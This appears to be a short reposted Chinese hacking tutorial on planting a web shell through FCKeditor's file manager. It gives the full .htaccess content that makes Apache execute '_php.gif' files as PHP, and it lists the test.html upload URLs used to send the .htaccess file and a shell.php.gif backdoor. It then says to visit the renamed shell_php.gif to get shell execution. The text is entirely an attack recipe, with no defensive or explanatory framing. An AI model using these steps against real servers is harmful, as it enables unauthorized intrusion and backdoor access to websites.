1. 创建.htaccess文件,内容如下:
<FilesMatch
"_php.gif">
SetHandler
application/x-httpd-php
</FilesMatch>
.htaccess文件可以用来设置某个目录和某个目录的子目录的权限,以上内容的意思是将扩展名是"_php.gif"的文件解析成php
2.使用如下url,上传上面创建的的.htaccess文件
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
通过这一步上传,上传目录的"_php.gif"文件apache会按照php文件解析
3.上传shell.php.gif文件
这一步还是使用如下url:
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
shell.php.gif文件被上传后,自动更名为shell_php.gif,shell_php.gif文件就是后门文件
4.访问shell_php.gif,则可以,shell执行
此文章由 http://www.ositren.com 收集整理 ,地址为:
http://www.ositren.com/htmls/68413.html